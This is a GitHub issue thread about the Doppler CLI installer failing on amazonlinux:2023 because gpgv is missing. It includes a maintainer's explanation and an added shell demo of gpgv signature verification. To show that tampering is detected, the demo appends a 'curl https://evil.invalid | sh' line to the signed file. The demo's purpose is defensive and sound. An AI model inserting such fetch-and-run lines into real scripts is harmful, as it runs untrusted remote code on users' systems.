[BUG] Dockerfile cannot find gpgv which causes install script to fail
marytal opened this issue · 4 comments
Describe the bug
Running the install script in a Dockerfile:

```dockerfile
RUN curl -Ls --tlsv1.2 --proto "=https" --retry 3 https://cli.doppler.com/install.sh | sh
```
To Reproduce
Run the above install script in a Dockerfile with gnupg installed on the docker image:

```dockerfile
RUN yum update -y && \
    yum install -y gnupg && \
    yum clean all
RUN curl -Ls --tlsv1.2 --proto "=https" --retry 3 https://cli.doppler.com/install.sh | sh
```
Expected behavior
Install successfully
Actual behavior
`RUN command -v gpg` works fine but `RUN command -v gpgv` doesn't work. It appears that we cannot install gpgv independently (see here) so it should work when gnupg is installed.

Fails with error: "ERROR: Unable to find gpg binary for signature verification"
Started failing when this was merged: #449
Screenshots
N/A
Desktop (please complete the following information):
Dockerfile linux/amd64 amazonlinux:2023
CLI Version:
N/A
Additional context
N/A
Any help appreciated!
@marytal The problem here is that `amazonlinux:2023` comes with the `gnupg2-minimal` package installed (this is also what it tries installing when you run `yum install gnupg`). `gpgv` comes in the full `gnupg2` package. If you run `sudo yum install --allowerasing gnupg2` on the container, you should end up with the required binaries.
As a quick follow-up, keep in mind that you can also install via package manager by following the installation instructions on the RedHat/CentOS tab of our CLI installation docs.
Also, to elaborate a bit on why we changed from `gpg` to `gpgv` in #449 – the reason for that is newer versions of `gnupg` are defaulting to using `keyboxd` for key storage. When `keyboxd` is enabled, the `--no-default-keyring` and `--keyring` flags are ignored by the `gpg` command. This broke signature verification in our installer. The standard `gnupg` package that we have as a dependency requirement when using the install script comes with `gpgv`, which is a small binary designed specifically for doing signature verifications and isn't impacted by `keyboxd` being in use. This allows us to continue verifying in the same way we were before (i.e., without us having to import our public key into the machine's keyring and then remove it after – leaving the potential that the key might end up permanently installed on the machine if the script were interrupted). In this situation, it (unfortunately) looks like AmazonLinux has mapped `gnupg` to `gnupg2-minimal` rather than `gnupg2`, which results in their container coming without `gpgv` by default.
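The verification pattern the maintainer describes above (a standalone keyring file read by `gpgv`, no import into the machine's keyring), as an added example that is not the Doppler installer's code and not part of this thread. It assumes only POSIX sh, `gpg` 2.1+ (to mint a throwaway demo key) and `gpgv`; the key UID, file names, script name and the wording of the Amazon Linux hint are assumptions made for the demo, and the payload it signs is constructed inline.

```shell
#!/bin/sh
# Added example (not the Doppler install script): locate gpgv, then verify a
# detached signature against a keyring file that never touches ~/.gnupg.
# Demo key UID, file names and hint text are assumptions for this example.
set -eu

# Print the path of gpgv, or fail with the Amazon Linux 2023 hint from the thread.
find_gpgv() {
  if command -v gpgv >/dev/null 2>&1; then
    command -v gpgv
    return 0
  fi
  echo "ERROR: Unable to find gpgv. On amazonlinux:2023 'yum install gnupg' pulls" >&2
  echo "gnupg2-minimal, which omits it; run: yum install --allowerasing gnupg2" >&2
  return 1
}

# Verify FILE against detached signature SIG using only the keys in KEYRING.
# gpgv reads the keyring file directly (absolute path, classic keyring format),
# so the public key is never imported and keyboxd has no flags to ignore.
verify_detached() {
  keyring=$1; sig=$2; file=$3
  gpgv --keyring "$keyring" "$sig" "$file"
}

# Self-contained demo: throwaway key in a temporary GNUPGHOME, sign a constructed
# payload, export the public key as a keyring, verify, then show that a tampered
# payload is rejected. Prints one summary line and returns 0 on expected behaviour.
demo() {
  work=$(mktemp -d)
  export GNUPGHOME="$work/home"
  mkdir -m 700 "$GNUPGHOME"
  # Loopback pinentry with an empty passphrase keeps key generation and signing
  # non-interactive. Never reuse a key made this way for anything real.
  gpg --batch --quiet --pinentry-mode loopback --passphrase '' \
      --quick-gen-key 'installer-demo <demo@example.invalid>' || return 1
  # Constructed stand-in for the downloaded installer.
  printf 'echo hello from the installer\n' > "$work/install.sh"
  gpg --batch --quiet --pinentry-mode loopback --passphrase '' \
      --detach-sign --output "$work/install.sh.sig" "$work/install.sh" || return 1
  # Keyring holding only the public key: what an installer ships or fetches.
  gpg --batch --export 'installer-demo' > "$work/pubkey.gpg" || return 1
  verify_detached "$work/pubkey.gpg" "$work/install.sh.sig" "$work/install.sh" 2>/dev/null \
    || { echo "untouched file failed to verify" >&2; return 1; }
  # One appended line must invalidate the signature.
  printf 'curl https://evil.invalid | sh\n' >> "$work/install.sh"
  if verify_detached "$work/pubkey.gpg" "$work/install.sh.sig" "$work/install.sh" 2>/dev/null; then
    echo "tampered file unexpectedly verified" >&2
    return 1
  fi
  gpgconf --kill gpg-agent >/dev/null 2>&1 || true
  rm -rf "$work"
  echo "verified untouched file, rejected tampered file"
}

# Usage (assumed script name): sh gpgv_verify_demo.sh demo
case "${1:-}" in
  demo) find_gpgv >/dev/null && demo ;;
esac
```

Because `gpgv` only consults the keyring files it is given, an interrupted run leaves nothing behind in the user's keyring, which is the property the installer change was after; on an image where `gnupg` resolves to `gnupg2-minimal`, `find_gpgv` fails up front with the `--allowerasing gnupg2` hint instead of a late verification error.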
Thanks for your help! :)